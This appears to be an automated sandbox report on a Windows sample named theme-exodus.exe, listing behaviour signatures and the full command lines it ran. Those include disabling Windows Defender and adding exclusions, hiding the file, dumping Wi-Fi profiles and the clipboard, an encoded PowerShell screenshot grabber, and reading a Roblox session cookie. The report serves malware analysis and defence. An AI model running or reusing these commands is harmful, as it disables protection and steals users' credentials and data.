| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe
"C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe"
C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe
"C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOAD UP exodus!', 0, 'exodus', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOAD UP exodus!', 0, 'exodus', 48+16);close()"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t4nzx3ds\t4nzx3ds.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87BE.tmp" "c:\Users\Admin\AppData\Local\Temp\t4nzx3ds\CSC5D9F9763EB18433FB67E9579B288AB26.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
